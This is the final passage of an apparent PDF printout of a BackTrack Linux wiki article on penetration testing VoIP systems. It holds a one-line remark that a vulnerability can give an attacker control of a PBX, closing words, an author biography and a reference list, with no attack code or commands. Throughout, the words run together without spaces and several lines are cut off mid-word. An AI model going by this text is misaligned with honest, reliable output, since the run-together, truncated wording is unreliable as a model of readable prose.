AlthoughthisisnotaSIPspecificvulnerabilityitisstillrelatedandcanenableafullcontrolbyanattackeronaPBX.

ClosingWords

Ihopeyouvefoundthisdocumentinformative,pleasekeepinmindthatBacktrackLinuxprovidesmanytoolsandfeatur
haventcoveredhere.TakethetimetobrowsethetoolsreadthemanualsandREADMEsIamsureyoullfindtherightt
job.
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

39/40

7/12/2015

PentestingVOIPBackTrackLinux

FeelfreetodiscussthetoolsandmethodsmentionedhereintheBacktrackLinuxForumswewouldlovetohereyourfee
andexperiences.
http://www.backtracklinux.org/forums/

AboutTheAuthor

Shairod(aka@NightRang3r)isafulltimePenTesteratAvnetInformationSecurity&RiskManagementinIsraelHeh
OffensivesecurityOSCPandOSCEcertifications(amongothers)andmanageshisblogathttp://exploit.co.il

References
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/
Retrievedfrom"http://www.backtracklinux.org/wiki/index.php?title=Pentesting_VOIP&oldid=789"
Thispagewaslastmodifiedon12June2011,at19:16.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

40/40

You might also like